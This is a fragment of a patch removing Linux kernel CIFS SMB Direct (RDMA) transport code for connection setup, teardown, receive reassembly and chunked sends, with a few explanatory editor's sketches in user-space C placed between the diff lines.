+-	queue_work(info->workqueue, &info->post_send_credits_work);
+-}
+-
+-/* Preallocate all receive buffers on transport establishment */
+-static int allocate_receive_buffers(struct smbd_connection *info, int num_buf)
+-{
+-	int i;
+-	struct smbd_response *response;
+-
+-	INIT_LIST_HEAD(&info->reassembly_queue);
+-	spin_lock_init(&info->reassembly_queue_lock);
+-	info->reassembly_data_length = 0;
+-	info->reassembly_queue_length = 0;
+-
+-	INIT_LIST_HEAD(&info->receive_queue);
+-	spin_lock_init(&info->receive_queue_lock);
+-	info->count_receive_queue = 0;
+-
+-	INIT_LIST_HEAD(&info->empty_packet_queue);
+-	spin_lock_init(&info->empty_packet_queue_lock);
+-	info->count_empty_packet_queue = 0;
+-
+-	init_waitqueue_head(&info->wait_receive_queues);
+-
+-	for (i = 0; i < num_buf; i++) {
+-		response = mempool_alloc(info->response_mempool, GFP_KERNEL);
+-		if (!response)
+-			goto allocate_failed;
+-
+-		response->info = info;
+-		list_add_tail(&response->list, &info->receive_queue);
+-		info->count_receive_queue++;
+-	}
+-
+-	return 0;
+-
+-allocate_failed:
+-	while (!list_empty(&info->receive_queue)) {
+-		response = list_first_entry(
+-				&info->receive_queue,
+-				struct smbd_response, list);
+-		list_del(&response->list);
+-		info->count_receive_queue--;
+-
+-		mempool_free(response, info->response_mempool);
+-	}
+-	return -ENOMEM;
+-}
+-
+-static void destroy_receive_buffers(struct smbd_connection *info)
+-{
+-	struct smbd_response *response;
+-
+-	while ((response = get_receive_buffer(info)))
+-		mempool_free(response, info->response_mempool);
+-
+-	while ((response = get_empty_queue_buffer(info)))
+-		mempool_free(response, info->response_mempool);
+-}
+-
+-/* Implement idle connection timer [MS-SMBD] 3.1.6.2 */
+-static void idle_connection_timer(struct work_struct *work)
+-{
+-	struct smbd_connection *info = container_of(
+-					work, struct smbd_connection,
+-					idle_timer_work.work);
+-
+-	if (info->keep_alive_requested != KEEP_ALIVE_NONE) {
+-		log_keep_alive(ERR,
+-			"error status info->keep_alive_requested=%d\n",
+-			info->keep_alive_requested);
+-		smbd_disconnect_rdma_connection(info);
+-		return;
+-	}
+-
+-	log_keep_alive(INFO, "about to send an empty idle message\n");
+-	smbd_post_send_empty(info);
+-
+-	/* Setup the next idle timeout work */
+-	queue_delayed_work(info->workqueue, &info->idle_timer_work,
+-			info->keep_alive_interval*HZ);
+-}
+-
+-/*
+- * Destroy the transport and related RDMA and memory resources
+- * Need to go through all the pending counters and make sure no one is using
+- * the transport while it is destroyed
+- */
+-void smbd_destroy(struct TCP_Server_Info *server)
+-{
+-	struct smbd_connection *info = server->smbd_conn;
+-	struct smbd_response *response;
+-	unsigned long flags;
+-
+-	if (!info) {
+-		log_rdma_event(INFO, "rdma session already destroyed\n");
+-		return;
+-	}
+-
+-	log_rdma_event(INFO, "destroying rdma session\n");
+-	if (info->transport_status != SMBD_DISCONNECTED) {
+-		rdma_disconnect(server->smbd_conn->id);
+-		log_rdma_event(INFO, "wait for transport being disconnected\n");
+-		wait_event_interruptible(
+-			info->disconn_wait,
+-			info->transport_status == SMBD_DISCONNECTED);
+-	}
+-
+-	log_rdma_event(INFO, "destroying qp\n");
+-	ib_drain_qp(info->id->qp);
+-	rdma_destroy_qp(info->id);
+-
+-	log_rdma_event(INFO, "cancelling idle timer\n");
+-	cancel_delayed_work_sync(&info->idle_timer_work);
+-
+-	log_rdma_event(INFO, "wait for all send posted to IB to finish\n");
+-	wait_event(info->wait_send_pending,
+-		atomic_read(&info->send_pending) == 0);
+-
+-	/* It's not possible for upper layer to get to reassembly */
+-	log_rdma_event(INFO, "drain the reassembly queue\n");
+-	do {
+-		spin_lock_irqsave(&info->reassembly_queue_lock, flags);
+-		response = _get_first_reassembly(info);
+-		if (response) {
+-			list_del(&response->list);
+-			spin_unlock_irqrestore(
+-				&info->reassembly_queue_lock, flags);
+-			put_receive_buffer(info, response);
+-		} else
+-			spin_unlock_irqrestore(
+-				&info->reassembly_queue_lock, flags);
+-	} while (response);
+-	info->reassembly_data_length = 0;
+-
+-	log_rdma_event(INFO, "free receive buffers\n");
+-	wait_event(info->wait_receive_queues,
+-		info->count_receive_queue + info->count_empty_packet_queue
+-			== info->receive_credit_max);
+-	destroy_receive_buffers(info);
+-
+-	/*
+-	 * For performance reasons, memory registration and deregistration
+-	 * are not locked by srv_mutex. It is possible some processes are
+-	 * blocked on transport srv_mutex while holding memory registration.
+-	 * Release the transport srv_mutex to allow them to hit the failure
+-	 * path when sending data, and then release memory registrations.
+-	 */
+-	log_rdma_event(INFO, "freeing mr list\n");
+-	wake_up_interruptible_all(&info->wait_mr);
+-	while (atomic_read(&info->mr_used_count)) {
+-		cifs_server_unlock(server);
+-		msleep(1000);
+-		cifs_server_lock(server);
+-	}
+-	destroy_mr_list(info);
+-
+-	ib_free_cq(info->send_cq);
+-	ib_free_cq(info->recv_cq);
+-	ib_dealloc_pd(info->pd);
+-	rdma_destroy_id(info->id);
+-
+-	/* free mempools */
+-	mempool_destroy(info->request_mempool);
+-	kmem_cache_destroy(info->request_cache);
+-
+-	mempool_destroy(info->response_mempool);
+-	kmem_cache_destroy(info->response_cache);
+-
+-	info->transport_status = SMBD_DESTROYED;
+-
+-	destroy_workqueue(info->workqueue);
+-	log_rdma_event(INFO,  "rdma session destroyed\n");
+-	kfree(info);
+-	server->smbd_conn = NULL;
+-}
+-
+-/*
+- * Reconnect this SMBD connection, called from upper layer
+- * return value: 0 on success, or actual error code
+- */
+-int smbd_reconnect(struct TCP_Server_Info *server)
+-{
+-	log_rdma_event(INFO, "reconnecting rdma session\n");
+-
+-	if (!server->smbd_conn) {
+-		log_rdma_event(INFO, "rdma session already destroyed\n");
+-		goto create_conn;
+-	}
+-
+-	/*
+-	 * This is possible if the transport is disconnected and we haven't
+-	 * received notification from RDMA, but the upper layer has detected a
+-	 * timeout
+-	 */
+-	if (server->smbd_conn->transport_status == SMBD_CONNECTED) {
+-		log_rdma_event(INFO, "disconnecting transport\n");
+-		smbd_destroy(server);
+-	}
+-
+-create_conn:
+-	log_rdma_event(INFO, "creating rdma session\n");
+-	server->smbd_conn = smbd_get_connection(
+-		server, (struct sockaddr *) &server->dstaddr);
+-
+-	if (server->smbd_conn)
+-		cifs_dbg(VFS, "RDMA transport re-established\n");
+-
+-	return server->smbd_conn ? 0 : -ENOENT;
+-}
+-
+-static void destroy_caches_and_workqueue(struct smbd_connection *info)
+-{
+-	destroy_receive_buffers(info);
+-	destroy_workqueue(info->workqueue);
+-	mempool_destroy(info->response_mempool);
+-	kmem_cache_destroy(info->response_cache);
+-	mempool_destroy(info->request_mempool);
+-	kmem_cache_destroy(info->request_cache);
+-}
+-
+-#define MAX_NAME_LEN	80
+-static int allocate_caches_and_workqueue(struct smbd_connection *info)
+-{
+-	char name[MAX_NAME_LEN];
+-	int rc;
+-
+-	scnprintf(name, MAX_NAME_LEN, "smbd_request_%p", info);
+-	info->request_cache =
+-		kmem_cache_create(
+-			name,
+-			sizeof(struct smbd_request) +
+-				sizeof(struct smbd_data_transfer),
+-			0, SLAB_HWCACHE_ALIGN, NULL);
+-	if (!info->request_cache)
+-		return -ENOMEM;
+-
+-	info->request_mempool =
+-		mempool_create(info->send_credit_target, mempool_alloc_slab,
+-			mempool_free_slab, info->request_cache);
+-	if (!info->request_mempool)
+-		goto out1;
+-
+-	scnprintf(name, MAX_NAME_LEN, "smbd_response_%p", info);
+-	info->response_cache =
+-		kmem_cache_create(
+-			name,
+-			sizeof(struct smbd_response) +
+-				info->max_receive_size,
+-			0, SLAB_HWCACHE_ALIGN, NULL);
+-	if (!info->response_cache)
+-		goto out2;
+-
+-	info->response_mempool =
+-		mempool_create(info->receive_credit_max, mempool_alloc_slab,
+-		       mempool_free_slab, info->response_cache);
+-	if (!info->response_mempool)
+-		goto out3;
+-
+-	scnprintf(name, MAX_NAME_LEN, "smbd_%p", info);
+-	info->workqueue = create_workqueue(name);
+-	if (!info->workqueue)
+-		goto out4;
+-
+-	rc = allocate_receive_buffers(info, info->receive_credit_max);
+-	if (rc) {
+-		log_rdma_event(ERR, "failed to allocate receive buffers\n");
+-		goto out5;
+-	}
+-
+-	return 0;
+-
+-out5:
+-	destroy_workqueue(info->workqueue);
+-out4:
+-	mempool_destroy(info->response_mempool);
+-out3:
+-	kmem_cache_destroy(info->response_cache);
+-out2:
+-	mempool_destroy(info->request_mempool);
+-out1:
+-	kmem_cache_destroy(info->request_cache);
+-	return -ENOMEM;
+-}
+-
+-/* Create a SMBD connection, called by upper layer */
+-static struct smbd_connection *_smbd_get_connection(
+-	struct TCP_Server_Info *server, struct sockaddr *dstaddr, int port)
+-{
+-	int rc;
+-	struct smbd_connection *info;
+-	struct rdma_conn_param conn_param;
+-	struct ib_qp_init_attr qp_attr;
+-	struct sockaddr_in *addr_in = (struct sockaddr_in *) dstaddr;
+-	struct ib_port_immutable port_immutable;
+-	u32 ird_ord_hdr[2];
+-
+-	info = kzalloc(sizeof(struct smbd_connection), GFP_KERNEL);
+-	if (!info)
+-		return NULL;
+-
+-	info->transport_status = SMBD_CONNECTING;
+-	rc = smbd_ia_open(info, dstaddr, port);
+-	if (rc) {
+-		log_rdma_event(INFO, "smbd_ia_open rc=%d\n", rc);
+-		goto create_id_failed;
+-	}
+-
+-	if (smbd_send_credit_target > info->id->device->attrs.max_cqe ||
+-	    smbd_send_credit_target > info->id->device->attrs.max_qp_wr) {
+-		log_rdma_event(ERR, "consider lowering send_credit_target = %d. Possible CQE overrun, device reporting max_cqe %d max_qp_wr %d\n",
+-			       smbd_send_credit_target,
+-			       info->id->device->attrs.max_cqe,
+-			       info->id->device->attrs.max_qp_wr);
+-		goto config_failed;
+-	}
+-
+-	if (smbd_receive_credit_max > info->id->device->attrs.max_cqe ||
+-	    smbd_receive_credit_max > info->id->device->attrs.max_qp_wr) {
+-		log_rdma_event(ERR, "consider lowering receive_credit_max = %d. Possible CQE overrun, device reporting max_cqe %d max_qp_wr %d\n",
+-			       smbd_receive_credit_max,
+-			       info->id->device->attrs.max_cqe,
+-			       info->id->device->attrs.max_qp_wr);
+-		goto config_failed;
+-	}
+-
+-	info->receive_credit_max = smbd_receive_credit_max;
+-	info->send_credit_target = smbd_send_credit_target;
+-	info->max_send_size = smbd_max_send_size;
+-	info->max_fragmented_recv_size = smbd_max_fragmented_recv_size;
+-	info->max_receive_size = smbd_max_receive_size;
+-	info->keep_alive_interval = smbd_keep_alive_interval;
+-
+-	if (info->id->device->attrs.max_send_sge < SMBDIRECT_MAX_SEND_SGE ||
+-	    info->id->device->attrs.max_recv_sge < SMBDIRECT_MAX_RECV_SGE) {
+-		log_rdma_event(ERR,
+-			"device %.*s max_send_sge/max_recv_sge = %d/%d too small\n",
+-			IB_DEVICE_NAME_MAX,
+-			info->id->device->name,
+-			info->id->device->attrs.max_send_sge,
+-			info->id->device->attrs.max_recv_sge);
+-		goto config_failed;
+-	}
+-
+-	info->send_cq = NULL;
+-	info->recv_cq = NULL;
+-	info->send_cq =
+-		ib_alloc_cq_any(info->id->device, info,
+-				info->send_credit_target, IB_POLL_SOFTIRQ);
+-	if (IS_ERR(info->send_cq)) {
+-		info->send_cq = NULL;
+-		goto alloc_cq_failed;
+-	}
+-
+-	info->recv_cq =
+-		ib_alloc_cq_any(info->id->device, info,
+-				info->receive_credit_max, IB_POLL_SOFTIRQ);
+-	if (IS_ERR(info->recv_cq)) {
+-		info->recv_cq = NULL;
+-		goto alloc_cq_failed;
+-	}
+-
+-	memset(&qp_attr, 0, sizeof(qp_attr));
+-	qp_attr.event_handler = smbd_qp_async_error_upcall;
+-	qp_attr.qp_context = info;
+-	qp_attr.cap.max_send_wr = info->send_credit_target;
+-	qp_attr.cap.max_recv_wr = info->receive_credit_max;
+-	qp_attr.cap.max_send_sge = SMBDIRECT_MAX_SEND_SGE;
+-	qp_attr.cap.max_recv_sge = SMBDIRECT_MAX_RECV_SGE;
+-	qp_attr.cap.max_inline_data = 0;
+-	qp_attr.sq_sig_type = IB_SIGNAL_REQ_WR;
+-	qp_attr.qp_type = IB_QPT_RC;
+-	qp_attr.send_cq = info->send_cq;
+-	qp_attr.recv_cq = info->recv_cq;
+-	qp_attr.port_num = ~0;
+-
+-	rc = rdma_create_qp(info->id, info->pd, &qp_attr);
+-	if (rc) {
+-		log_rdma_event(ERR, "rdma_create_qp failed %i\n", rc);
+-		goto create_qp_failed;
+-	}
+-
+-	memset(&conn_param, 0, sizeof(conn_param));
+-	conn_param.initiator_depth = 0;
+-
+-	conn_param.responder_resources =
+-		info->id->device->attrs.max_qp_rd_atom
+-			< SMBD_CM_RESPONDER_RESOURCES ?
+-		info->id->device->attrs.max_qp_rd_atom :
+-		SMBD_CM_RESPONDER_RESOURCES;
+-	info->responder_resources = conn_param.responder_resources;
+-	log_rdma_mr(INFO, "responder_resources=%d\n",
+-		info->responder_resources);
+-
+-	/* Need to send IRD/ORD in private data for iWARP */
+-	info->id->device->ops.get_port_immutable(
+-		info->id->device, info->id->port_num, &port_immutable);
+-	if (port_immutable.core_cap_flags & RDMA_CORE_PORT_IWARP) {
+-		ird_ord_hdr[0] = info->responder_resources;
+-		ird_ord_hdr[1] = 1;
+-		conn_param.private_data = ird_ord_hdr;
+-		conn_param.private_data_len = sizeof(ird_ord_hdr);
+-	} else {
+-		conn_param.private_data = NULL;
+-		conn_param.private_data_len = 0;
+-	}
+-
+-	conn_param.retry_count = SMBD_CM_RETRY;
+-	conn_param.rnr_retry_count = SMBD_CM_RNR_RETRY;
+-	conn_param.flow_control = 0;
+-
+-	log_rdma_event(INFO, "connecting to IP %pI4 port %d\n",
+-		&addr_in->sin_addr, port);
+-
+-	init_waitqueue_head(&info->conn_wait);
+-	init_waitqueue_head(&info->disconn_wait);
+-	init_waitqueue_head(&info->wait_reassembly_queue);
+-	rc = rdma_connect(info->id, &conn_param);
+-	if (rc) {
+-		log_rdma_event(ERR, "rdma_connect() failed with %i\n", rc);
+-		goto rdma_connect_failed;
+-	}
+-
+-	wait_event_interruptible(
+-		info->conn_wait, info->transport_status != SMBD_CONNECTING);
+-
+-	if (info->transport_status != SMBD_CONNECTED) {
+-		log_rdma_event(ERR, "rdma_connect failed port=%d\n", port);
+-		goto rdma_connect_failed;
+-	}
+-
+-	log_rdma_event(INFO, "rdma_connect connected\n");
+-
+-	rc = allocate_caches_and_workqueue(info);
+-	if (rc) {
+-		log_rdma_event(ERR, "cache allocation failed\n");
+-		goto allocate_cache_failed;
+-	}
+-
+-	init_waitqueue_head(&info->wait_send_queue);
+-	INIT_DELAYED_WORK(&info->idle_timer_work, idle_connection_timer);
+-	queue_delayed_work(info->workqueue, &info->idle_timer_work,
+-		info->keep_alive_interval*HZ);
+-
+-	init_waitqueue_head(&info->wait_send_pending);
+-	atomic_set(&info->send_pending, 0);
+-
+-	init_waitqueue_head(&info->wait_post_send);
+-
+-	INIT_WORK(&info->disconnect_work, smbd_disconnect_rdma_work);
+-	INIT_WORK(&info->post_send_credits_work, smbd_post_send_credits);
+-	info->new_credits_offered = 0;
+-	spin_lock_init(&info->lock_new_credits_offered);
+-
+-	rc = smbd_negotiate(info);
+-	if (rc) {
+-		log_rdma_event(ERR, "smbd_negotiate rc=%d\n", rc);
+-		goto negotiation_failed;
+-	}
+-
+-	rc = allocate_mr_list(info);
+-	if (rc) {
+-		log_rdma_mr(ERR, "memory registration allocation failed\n");
+-		goto allocate_mr_failed;
+-	}
+-
+-	return info;
+-
+-allocate_mr_failed:
+-	/* At this point, we need to do a full transport shutdown */
+-	server->smbd_conn = info;
+-	smbd_destroy(server);
+-	return NULL;
+-
+-negotiation_failed:
+-	cancel_delayed_work_sync(&info->idle_timer_work);
+-	destroy_caches_and_workqueue(info);
+-	info->transport_status = SMBD_NEGOTIATE_FAILED;
+-	init_waitqueue_head(&info->conn_wait);
+-	rdma_disconnect(info->id);
+-	wait_event(info->conn_wait,
+-		info->transport_status == SMBD_DISCONNECTED);
+-
+-allocate_cache_failed:
+-rdma_connect_failed:
+-	rdma_destroy_qp(info->id);
+-
+-create_qp_failed:
+-alloc_cq_failed:
+-	if (info->send_cq)
+-		ib_free_cq(info->send_cq);
+-	if (info->recv_cq)
+-		ib_free_cq(info->recv_cq);
+-
+-config_failed:
+-	ib_dealloc_pd(info->pd);
+-	rdma_destroy_id(info->id);
+-
+-create_id_failed:
+-	kfree(info);
+-	return NULL;
+-}
+-
+-struct smbd_connection *smbd_get_connection(
+-	struct TCP_Server_Info *server, struct sockaddr *dstaddr)
+-{
+-	struct smbd_connection *ret;
+-	int port = SMBD_PORT;
+-
+-try_again:
+-	ret = _smbd_get_connection(server, dstaddr, port);
+-
+-	/* Try SMB_PORT if SMBD_PORT doesn't work */
+-	if (!ret && port == SMBD_PORT) {
+-		port = SMB_PORT;
+-		goto try_again;
+-	}
+-	return ret;
+-}
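/*
 * Editor's note: a minimal user-space sketch of the retry pattern above —
 * try the SMB Direct port first and fall back to the regular SMB port
 * exactly once. connect_fn is a hypothetical callback; the port values
 * mirror the kernel's SMBD_PORT/SMB_PORT constants.
 */
#define SMB_PORT	445
#define SMBD_PORT	5445

void *connect_with_fallback(void *(*connect_fn)(int port))
{
	void *conn;

	conn = connect_fn(SMBD_PORT);		/* preferred: SMB Direct */
	if (!conn)
		conn = connect_fn(SMB_PORT);	/* fall back exactly once */
	return conn;
}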
+-
+-/*
+- * Receive data from the receive reassembly queue
+- * All the incoming data packets are placed in the reassembly queue
+- * buf: the buffer to read data into
+- * size: the length of data to read
+- * return value: actual data read
+- * Note: this implementation copies the data from the reassembly queue to
+- * receive buffers used by the upper layer. This is not the optimal code path.
+- * A better way to do it is to not have the upper layer allocate its receive
+- * buffers but rather borrow the buffer from the reassembly queue, and return
+- * it after the data is consumed. But this will require more changes to upper
+- * layer code, and also needs to consider packet boundaries while they are
+- * still being reassembled.
+- */
+-static int smbd_recv_buf(struct smbd_connection *info, char *buf,
+-		unsigned int size)
+-{
+-	struct smbd_response *response;
+-	struct smbd_data_transfer *data_transfer;
+-	int to_copy, to_read, data_read, offset;
+-	u32 data_length, remaining_data_length, data_offset;
+-	int rc;
+-
+-again:
+-	/*
+-	 * No need to hold the reassembly queue lock all the time as we are
+-	 * the only one reading from the front of the queue. The transport
+-	 * may add more entries to the back of the queue at the same time
+-	 */
+-	log_read(INFO, "size=%d info->reassembly_data_length=%d\n", size,
+-		info->reassembly_data_length);
+-	if (info->reassembly_data_length >= size) {
+-		int queue_length;
+-		int queue_removed = 0;
+-
+-		/*
+-		 * Need to make sure reassembly_data_length is read before
+-		 * reading reassembly_queue_length and calling
+-		 * _get_first_reassembly. This call is lock free
+-		 * as we never read the end of the queue, which is being
+-		 * updated in SOFTIRQ context as more data is received
+-		 */
+-		virt_rmb();
+-		queue_length = info->reassembly_queue_length;
+-		data_read = 0;
+-		to_read = size;
+-		offset = info->first_entry_offset;
+-		while (data_read < size) {
+-			response = _get_first_reassembly(info);
+-			data_transfer = smbd_response_payload(response);
+-			data_length = le32_to_cpu(data_transfer->data_length);
+-			remaining_data_length =
+-				le32_to_cpu(
+-					data_transfer->remaining_data_length);
+-			data_offset = le32_to_cpu(data_transfer->data_offset);
+-
+-			/*
+-			 * The upper layer expects RFC1002 length at the
+-			 * beginning of the payload. Return it to indicate
+-			 * the total length of the packet. This minimizes the
+-			 * changes to upper layer packet processing logic. This
+-			 * will eventually be removed when an intermediate
+-			 * transport layer is added
+-			 */
+-			if (response->first_segment && size == 4) {
+-				unsigned int rfc1002_len =
+-					data_length + remaining_data_length;
+-				*((__be32 *)buf) = cpu_to_be32(rfc1002_len);
+-				data_read = 4;
+-				response->first_segment = false;
+-				log_read(INFO, "returning rfc1002 length %d\n",
+-					rfc1002_len);
+-				goto read_rfc1002_done;
+-			}
+-
+-			to_copy = min_t(int, data_length - offset, to_read);
+-			memcpy(
+-				buf + data_read,
+-				(char *)data_transfer + data_offset + offset,
+-				to_copy);
+-
+-			/* move on to the next buffer? */
+-			if (to_copy == data_length - offset) {
+-				queue_length--;
+-				/*
+-				 * No need to lock if we are not at the
+-				 * end of the queue
+-				 */
+-				if (queue_length)
+-					list_del(&response->list);
+-				else {
+-					spin_lock_irq(
+-						&info->reassembly_queue_lock);
+-					list_del(&response->list);
+-					spin_unlock_irq(
+-						&info->reassembly_queue_lock);
+-				}
+-				queue_removed++;
+-				info->count_reassembly_queue--;
+-				info->count_dequeue_reassembly_queue++;
+-				put_receive_buffer(info, response);
+-				offset = 0;
+-				log_read(INFO, "put_receive_buffer offset=0\n");
+-			} else
+-				offset += to_copy;
+-
+-			to_read -= to_copy;
+-			data_read += to_copy;
+-
+-			log_read(INFO, "_get_first_reassembly memcpy %d bytes data_transfer_length-offset=%d after that to_read=%d data_read=%d offset=%d\n",
+-				 to_copy, data_length - offset,
+-				 to_read, data_read, offset);
+-		}
+-
+-		spin_lock_irq(&info->reassembly_queue_lock);
+-		info->reassembly_data_length -= data_read;
+-		info->reassembly_queue_length -= queue_removed;
+-		spin_unlock_irq(&info->reassembly_queue_lock);
+-
+-		info->first_entry_offset = offset;
+-		log_read(INFO, "returning to thread data_read=%d reassembly_data_length=%d first_entry_offset=%d\n",
+-			 data_read, info->reassembly_data_length,
+-			 info->first_entry_offset);
+-read_rfc1002_done:
+-		return data_read;
+-	}
+-
+-	log_read(INFO, "wait_event on more data\n");
+-	rc = wait_event_interruptible(
+-		info->wait_reassembly_queue,
+-		info->reassembly_data_length >= size ||
+-			info->transport_status != SMBD_CONNECTED);
+-	/* Don't return any data if interrupted */
+-	if (rc)
+-		return rc;
+-
+-	if (info->transport_status != SMBD_CONNECTED) {
+-		log_read(ERR, "disconnected\n");
+-		return -ECONNABORTED;
+-	}
+-
+-	goto again;
+-}
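/*
 * Editor's note: a self-contained sketch of the synthesized RFC1002
 * length returned above on the first 4-byte read of a payload — the
 * total is the first segment's data_length plus remaining_data_length,
 * written as a 32-bit big-endian byte count:
 */
#include <stdint.h>

static void write_rfc1002_len(uint8_t buf[4], uint32_t data_length,
			      uint32_t remaining_data_length)
{
	uint32_t total = data_length + remaining_data_length;

	buf[0] = (uint8_t)(total >> 24);
	buf[1] = (uint8_t)(total >> 16);
	buf[2] = (uint8_t)(total >> 8);
	buf[3] = (uint8_t)total;
}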
+-
+-/*
+- * Receive a page from the receive reassembly queue
+- * page: the page to read data into
+- * to_read: the length of data to read
+- * return value: actual data read
+- */
+-static int smbd_recv_page(struct smbd_connection *info,
+-		struct page *page, unsigned int page_offset,
+-		unsigned int to_read)
+-{
+-	int ret;
+-	char *to_address;
+-	void *page_address;
+-
+-	/* make sure we have the page ready for read */
+-	ret = wait_event_interruptible(
+-		info->wait_reassembly_queue,
+-		info->reassembly_data_length >= to_read ||
+-			info->transport_status != SMBD_CONNECTED);
+-	if (ret)
+-		return ret;
+-
+-	/* now we can read from reassembly queue and not sleep */
+-	page_address = kmap_atomic(page);
+-	to_address = (char *) page_address + page_offset;
+-
+-	log_read(INFO, "reading from page=%p address=%p to_read=%d\n",
+-		page, to_address, to_read);
+-
+-	ret = smbd_recv_buf(info, to_address, to_read);
+-	kunmap_atomic(page_address);
+-
+-	return ret;
+-}
+-
+-/*
+- * Receive data from transport
+- * msg: a msghdr pointing to the buffer, can be ITER_KVEC or ITER_BVEC
+- * return: total bytes read, or 0. SMB Direct will not do a partial read.
+- */
+-int smbd_recv(struct smbd_connection *info, struct msghdr *msg)
+-{
+-	char *buf;
+-	struct page *page;
+-	unsigned int to_read, page_offset;
+-	int rc;
+-
+-	if (iov_iter_rw(&msg->msg_iter) == WRITE) {
+-		/* It's a bug in the upper layer to get here */
+-		cifs_dbg(VFS, "Invalid msg iter dir %u\n",
+-			 iov_iter_rw(&msg->msg_iter));
+-		rc = -EINVAL;
+-		goto out;
+-	}
+-
+-	switch (iov_iter_type(&msg->msg_iter)) {
+-	case ITER_KVEC:
+-		buf = msg->msg_iter.kvec->iov_base;
+-		to_read = msg->msg_iter.kvec->iov_len;
+-		rc = smbd_recv_buf(info, buf, to_read);
+-		break;
+-
+-	case ITER_BVEC:
+-		page = msg->msg_iter.bvec->bv_page;
+-		page_offset = msg->msg_iter.bvec->bv_offset;
+-		to_read = msg->msg_iter.bvec->bv_len;
+-		rc = smbd_recv_page(info, page, page_offset, to_read);
+-		break;
+-
+-	default:
+-		/* It's a bug in the upper layer to get here */
+-		cifs_dbg(VFS, "Invalid msg type %d\n",
+-			 iov_iter_type(&msg->msg_iter));
+-		rc = -EINVAL;
+-	}
+-
+-out:
+-	/* SMBDirect will read it all or nothing */
+-	if (rc > 0)
+-		msg->msg_iter.count = 0;
+-	return rc;
+-}
+-
+-/*
+- * Send data to transport
+- * Each rqst is transported as an SMBDirect payload
+- * rqst: the data to write
+- * return value: 0 on successful write, otherwise an error code
+- */
+-int smbd_send(struct TCP_Server_Info *server,
+-	int num_rqst, struct smb_rqst *rqst_array)
+-{
+-	struct smbd_connection *info = server->smbd_conn;
+-	struct kvec vecs[SMBDIRECT_MAX_SEND_SGE - 1];
+-	int nvecs;
+-	int size;
+-	unsigned int buflen, remaining_data_length;
+-	unsigned int offset, remaining_vec_data_length;
+-	int start, i, j;
+-	int max_iov_size =
+-		info->max_send_size - sizeof(struct smbd_data_transfer);
+-	struct kvec *iov;
+-	int rc;
+-	struct smb_rqst *rqst;
+-	int rqst_idx;
+-
+-	if (info->transport_status != SMBD_CONNECTED)
+-		return -EAGAIN;
+-
+-	/*
+-	 * Add in the page array if there is one. The caller needs to set
+-	 * rq_tailsz to PAGE_SIZE when the buffer has multiple pages and
+-	 * ends at a page boundary
+-	 */
+-	remaining_data_length = 0;
+-	for (i = 0; i < num_rqst; i++)
+-		remaining_data_length += smb_rqst_len(server, &rqst_array[i]);
+-
+-	if (unlikely(remaining_data_length > info->max_fragmented_send_size)) {
+-		/* assertion: payload never exceeds negotiated maximum */
+-		log_write(ERR, "payload size %d > max size %d\n",
+-			remaining_data_length, info->max_fragmented_send_size);
+-		return -EINVAL;
+-	}
+-
+-	log_write(INFO, "num_rqst=%d total length=%u\n",
+-			num_rqst, remaining_data_length);
+-
+-	rqst_idx = 0;
+-	do {
+-		rqst = &rqst_array[rqst_idx];
+-		iov = rqst->rq_iov;
+-
+-		cifs_dbg(FYI, "Sending smb (RDMA): idx=%d smb_len=%lu\n",
+-			rqst_idx, smb_rqst_len(server, rqst));
+-		remaining_vec_data_length = 0;
+-		for (i = 0; i < rqst->rq_nvec; i++) {
+-			remaining_vec_data_length += iov[i].iov_len;
+-			dump_smb(iov[i].iov_base, iov[i].iov_len);
+-		}
+-
+-		log_write(INFO, "rqst_idx=%d nvec=%d rqst->rq_npages=%d rq_pagesz=%d rq_tailsz=%d buflen=%lu\n",
+-			  rqst_idx, rqst->rq_nvec,
+-			  rqst->rq_npages, rqst->rq_pagesz,
+-			  rqst->rq_tailsz, smb_rqst_len(server, rqst));
+-
+-		start = 0;
+-		offset = 0;
+-		do {
+-			buflen = 0;
+-			i = start;
+-			j = 0;
+-			while (i < rqst->rq_nvec &&
+-				j < SMBDIRECT_MAX_SEND_SGE - 1 &&
+-				buflen < max_iov_size) {
+-
+-				vecs[j].iov_base = iov[i].iov_base + offset;
+-				if (buflen + iov[i].iov_len > max_iov_size) {
+-					vecs[j].iov_len =
+-						max_iov_size - iov[i].iov_len;
+-					buflen = max_iov_size;
+-					offset = vecs[j].iov_len;
+-				} else {
+-					vecs[j].iov_len =
+-						iov[i].iov_len - offset;
+-					buflen += vecs[j].iov_len;
+-					offset = 0;
+-					++i;
+-				}
+-				++j;
+-			}
+-
+-			remaining_vec_data_length -= buflen;
+-			remaining_data_length -= buflen;
+-			log_write(INFO, "sending %s iov[%d] from start=%d nvecs=%d remaining_data_length=%d\n",
+-					remaining_vec_data_length > 0 ?
+-						"partial" : "complete",
+-					rqst->rq_nvec, start, j,
+-					remaining_data_length);
+-
+-			start = i;
+-			rc = smbd_post_send_data(info, vecs, j, remaining_data_length);
+-			if (rc)
+-				goto done;
+-		} while (remaining_vec_data_length > 0);
+-
+-		/* now sending pages if there are any */
+-		for (i = 0; i < rqst->rq_npages; i++) {
+-			rqst_page_get_length(rqst, i, &buflen, &offset);
+-			nvecs = (buflen + max_iov_size - 1) / max_iov_size;
+-			log_write(INFO, "sending pages buflen=%d nvecs=%d\n",
+-				buflen, nvecs);
+-			for (j = 0; j < nvecs; j++) {
+-				size = min_t(unsigned int, max_iov_size, remaining_data_length);
+-				remaining_data_length -= size;
+-				log_write(INFO, "sending pages i=%d offset=%d size=%d remaining_data_length=%d\n",
+-					  i, j * max_iov_size + offset, size,
+-					  remaining_data_length);
+-				rc = smbd_post_send_page(
+-					info, rqst->rq_pages[i],
+-					j*max_iov_size + offset,
+-					size, remaining_data_length);
+-				if (rc)
+-					goto done;
+-			}
+-		}
+-	} while (++rqst_idx < num_rqst);
+-
+-done:
+-	/*
+-	 * As an optimization, we don't wait for individual I/O to finish
+-	 * before sending the next one.
+-	 * Send them all and wait for the pending send count to get to 0;
+-	 * that means all the I/Os have gone out and we are good to return
+-	 */
+-
+-	wait_event(info->wait_send_pending,
+-		atomic_read(&info->send_pending) == 0);
+-
+-	return rc;
+-}
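/*
 * Editor's note: an illustrative user-space reduction of the send loop
 * above — split a payload into chunks no larger than max_iov_size and
 * announce how much still follows each chunk, the way every SMBD data
 * transfer packet carries remaining_data_length for the peer.
 */
#include <stddef.h>
#include <stdio.h>

static void send_in_chunks(size_t payload_len, size_t max_iov_size)
{
	size_t remaining = payload_len;

	while (remaining > 0) {
		size_t chunk = remaining < max_iov_size ?
					remaining : max_iov_size;

		remaining -= chunk;
		/* each packet tells the peer how much is still to come */
		printf("send %zu bytes, remaining_data_length=%zu\n",
		       chunk, remaining);
	}
}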
+-
+-static void register_mr_done(struct ib_cq *cq, struct ib_wc *wc)
